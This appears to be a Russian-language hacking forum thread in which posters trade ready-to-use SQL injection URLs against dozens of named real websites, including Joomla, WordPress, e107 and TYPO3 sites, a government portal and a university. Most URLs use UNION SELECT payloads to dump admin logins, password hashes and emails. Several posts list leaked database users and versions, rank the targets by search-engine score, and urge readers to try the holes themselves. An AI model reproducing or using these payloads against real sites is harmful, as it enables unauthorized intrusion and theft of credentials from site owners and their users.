SQL Инъекции

http://smu17.ru/stol.php?id=-1+union+select+1,concat(LOGIN,0x3a,PASS)+from+kapital_zed_users+limit+0,1--
Tic-30 админка /zed/
PS. через эту же скулю еще сотня соседей. Дерзайте

 

PHP:

http://blinginbox.com/product.php?cateId=10&sx=-15+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--

 

Code:

http://www.yuzhnoye.com/?id=14'%20and%20substring(version(),1,1)=5--%201&path=about_company/history/missiles/missiles

 

Code:

http://www.sportware.ru/?id=-91+and+1=0+union+select+1,2,version(),4,5,6,7--

Code:

http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,version(),3--

 

Code:

http://www.irancivilcenter.com/en/news/view.php?news_id=-3+union+select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,2,3,4,5--

Username: iranciv_icc82m@localhost
Version: 5.0.91-community
Database: iranciv_news

Google PR: 5

 

http://danlempriere.com/articles.php?id=2+and+substring((select+1),1,1)=true

MDB2

нету прав нa mdb2 schema

 

http://www.simport.ru/?page=3&id=2+and+1=0+union+select+1,2,group_concat%28table_name%29,4,5,6,7+from+information_schema.tables+where+table_schema=database%28%29+--+

 

Дырявая джумла:
--------------------------------------------------------------------------
http://www.reynoldsburgchurch.org/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,3,4,concat_ws%280x3a,username,p ass word%29,6,7+from+jos_users--
--------------------------------------------------------------------------
http://www.pokermachinez.com/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user%28%29,4,@@version,6,concat_ws%280x3a,username,p ass word%29+from+jos_users--
--------------------------------------------------------------------------
http://www.sinab.gov.ec/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat%280x1e,usernam e,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sitgesrestaurantes.com/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat%280x1e,us ername,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sobakavdome.ru/index.php?option=com_iss&task=expotag&id=602+and+1=0+union+select+0,1,2,3,4,group_concat%28us ername,0x3a,p ass word,0x3a,email%29+from+jos_users--
--------------------------------------------------------------------------

 

Code:

http://isfav.it/index.php?pag=materie&id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(schema_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%202,1),0x31303235343830303536--

База isfav_db2
И пара других там еще есть =)
PR 4

 

Бажный водпресс:
---------------------------------------------------------------------------
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,use r_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(user_login,0x3a,u ser_p ass),4+from+wp_users--
(Уникальная вещь для меня, первый раз получилось через админ.пхп скулю провести)
P.S. Сервак виндовый
---------------------------------------------------------------------------
http://www.kfir.co.il/news.php?id=23+and+1=0+union+select+1,group_concat(u ser_login,0x3a,user_p ass),3,4,5,6,7,8,9+from+wp_users--
---------------------------------------------------------------------------
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,u ser_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.bulldogdesigninc.com/News.php?id=12+AND+1=2+UNION+SELECT+0,1,2,3,group_concat(user_login,0x3a,user_pass),5%20from%20wp_users--
---------------------------------------------------------------------------
http://www.jeremybouma.net/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://staroftheseakeywest.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://cycling4fun.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://www.giveawayriches.com/jvblog/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x7c,user_login,0x7c,u ser_p ass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users
---------------------------------------------------------------------------
З.Ы. Блин, да сколько же дырок-то....

 

www.bayern-international.de тИЦ — 10 PR — 6

Code:

http://www.bayern-international.de/nc/en/business-in-bavaria/key-technologies-in-bavaria/company-details.html?tx_hbkeytech_pi2%5BfirmaID%5D=-28997'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(table_name)+from+information_schema.tables+group+by+table_schema+limit+1,1+--+&tx_hbkeytech_pi2%5BkeyTechID%5D=20'

www.blankom.de тИЦ — 10 PR — 3

Code:

http://www.blankom.de/index.php?id=245&tx_osdbproducts_pi1[cid1]=35&tx_osdbproducts_pi1[cid2]=85&tx_osdbproducts_pi1[cid3]=-170+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+&tx_osdbproducts_pi1[number]=9062.02&cHash=2116147af1&L=1

law.emory.edu тИЦ — 70 PR — 6

Code:

http://www.law.emory.edu/index.php?id=5132&tx_wfqbe_pi1%5Bid%5D=-73+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables+--+

smania.it тИЦ — 100 PR — 3

Code:

http://www.smania.it/index.php?id=52&L=1&tx_newscatmenu_pi1[parent_category]=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,group_concat(concat_ws(0x3a3a,username,password,admin))+from+be_users+/*+

sfx-360.com тИЦ — 10 PR — 4

Code:

http://www.sfx-360.com/index.php?idEvent=-56+union+select+1,concat_ws(0x3a3a,user_name,password),3,4,5,6+from+user+--+

alucobond.eu тИЦ — 10 PR — 1

Code:

http://www.alucobond.eu/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-8'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=2e397a1d90

ofi-am.fr тИЦ — 10 PR — 4

Code:

http://www.ofi-am.fr/html/ofiWebTV.php?laVideo=/inout/video/52/trussant.flv&idVideo=-52'+union+select+1,concat_ws(0x3a3a,IDADMIN,IDENT,PASS),3,4,5,6,7,8,9,10,11,12+from+ADMIN+--+

oblivion.it тИЦ — 10 PR — 4

Code:

http://www.oblivion.it/html/obliviontv.php?idvideo=-47+union+select+1,2,user(),4,5,6,7,8+--+

habitatsis.com тИЦ — 10

Code:

http://www.habitatsis.com/html/hs_formacion/Videos.asp?IdCategoria=1011&Inmobiliaria=&IdVideo=-10022+union+select+1,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

chasse-enligne.com тИЦ — 10 PR — 3

Code:

http://www.chasse-enligne.com/pub/redirect.php?IDPub=-16+union+select+concat_ws(0x3a3a,login,password)+from+admin+limit+0,1+--+

teoremaonline.it тИЦ — 10 PR — 4

Code:

http://www.teoremaonline.it/index.php?l=en&idn=33&idevent=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a3a,mail,password,surname),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+privatearea_user+--+&cat=3'&onlpg=4'

bmwmcpiacenza.it тИЦ — 10

Code:

http://bmwmcpiacenza.it/index.php?obj=site&cmd=event_show&idevent=-10+union+select+1,2,3,4,user(),6,7,8+--+

www.dbugbcn.org тИЦ — 10 PR — 3

Code:

http://www.dbugbcn.org/index.php?idevent=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94+--+

cqll.be тИЦ — 10 PR — 4

Code:

http://www.cqll.be/index.php?inc=view_event.php&id=-2+union+select+1,2,concat_ws(0x3a3a,id_level,user,password),4+from+administrateur_site+--+&sid=0&idevent=165'

5aan.com тИЦ — 10

Code:

http://www.5aan.com/index.php?act=detailproduct&idevent=-36+union+select+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3a3a,username,password,email,permasion),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+adminuser+--+

lettera27.org тИЦ — 10 PR — 5

Code:

http://www.lettera27.org/index.php?idlanguage=1&zone=9&idprj=1483&idevent=-1528+union+select+user()+--+

 

А теперь е107
---------------------------------------------------------------------------
http://www.kna.edu.stockholm.se/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,u ser_p ass word,8,9,0,11,12,13%20from%20e107_user--
---------------------------------------------------------------------------
http://www.lyngholm-thy.dk/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
---------------------------------------------------------------------------
http://www.jacksmannequin.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,u ser_p ass word),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
------------------------------------------------------------------------
http://lombardo-mebelsbg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.stephenslawncare.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.papagali-bg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user--
------------------------------------------------------------------------
http://www.megalit33.ru/plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://teambmecte.ru/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
З.Ы. Это я свою программку проверяю хорошо трудится

 

http://www.ahyaqiang.com/En/news.php?id=1+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)
PR: 1
user: yqdb
database: sqlyqdb
version: 5.0.90-log

 

Code:

[COLOR=Wheat]http://www.bda.org.uk/news.php?action=view&news_id=-238+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11+from+administrators--[/COLOR]

Username: [email protected]
Version: 5.0.91-log
Database: db298445383

Google PR: 6

 

Code:

http://www.russianw.com/articles/article.php?ID=-615'%20union%20select%201,2,unhex(hex(concat(logname,0x3a,password,0x3a,email))),4,5,6,7,8,9%20from%20exp_admin--%201

method=post

 

Code:

http://jimdunlop.com/index.php?page=products/pip&id=304%20AND%20Length((user()))=22

Google PR=5

 

http://okasse.ru/_Docs/doc_show.asp?docs_id=103+and+1=0+union+select+1,2,3,4,5,group_concat(table_name),7,8+from+information_schema.tables+where+table_schema='iskra-6'+--+
ТИЦ : 550

http://www.sigma-is.ru/cgi-bin/news.pl?id_news=303+and+1=0+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name='users'+--+
ТИЦ : 475

 

Code:

http://www.vup.hr/index.php?file=pages/rubrika.php&id=-27+union+select+1,group_concat%28table_name%29,3,4+from+information_schema.tables--+

 

Code:

http://www.sevtolib.iuf.net/index.php?id=59'%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))having%20min(0)%20or%201--%201

 

Премиум Яхтс

http://www.premiumyachts.ru/news/?view_news=true&news_id=-111+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5,6,7,8+--

5.1.43-log py@localhost py portbld-freebsd7.3